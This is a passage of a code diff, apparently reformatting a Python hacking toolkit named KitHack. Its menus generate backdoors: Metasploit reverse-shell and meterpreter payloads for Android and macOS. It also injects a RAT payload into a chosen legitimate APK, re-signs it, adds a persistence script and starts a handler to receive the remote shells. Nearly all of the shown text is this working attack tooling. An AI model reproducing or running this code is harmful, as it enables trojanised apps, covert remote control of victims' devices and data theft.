output/payload output/payload.apk") - print( - "\n{0}[*] Configuring icon change...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/payload -o output/kithack.apk") + os.system( + "apktool b output/payload -o output/kithack.apk") location = os.getcwd() if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": - print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif a == "02": - print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) - print( - "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) - ) - print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) if m == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk".format( - APK, LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) location = os.getcwd() - if os.stat("output/{}.apk".format(mainout)).st_size != 0: + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif m == "02": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk".format( - LPORT, LHOST - ) - ) + "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) location = os.getcwd() - print( - "{0}[*] Decompiling original APK...{1}".format( - GREEN, DEFAULT - ) - ) + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( - APK, location - ) - ) - print( - "\n{0}[*] Decompiling payload APK...{1}".format( - GREEN, DEFAULT - ) - ) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring RAT Payload...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/original -o output/kithack.apk") + os.system( + "apktool b output/original -o output/kithack.apk") if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() @@ -6422,10 +5303,14 @@ def main(): elif sys == "04": print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) - print("{0}[01]{1} osx/x64/meterpreter_reverse_http".format(WHITE, YELLOW)) - print("{0}[02]{1} osx/x64/meterpreter_reverse_https".format(WHITE, YELLOW)) - print("{0}[03]{1} osx/x64/meterpreter_reverse_tcp".format(WHITE, YELLOW)) - print("{0}[04]{1} osx/x64/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[01]{1} osx/x64/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[02]{1} osx/x64/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[03]{1} osx/x64/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[04]{1} osx/x64/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) print("{0}[05]{1} osx/x64/shell_reverse_tcp".format(WHITE, YELLOW)) print("{0}[06]{1} osx/x86/shell_reverse_tcp".format(WHITE, YELLOW)) @@ -6436,55 +5321,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.macho".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -6494,55 +5369,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.macho".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -6552,55 +5417,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.macho".format(mainout)).st_size != 0: - print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause("\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") @@ -6610,55 +5465,45 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if 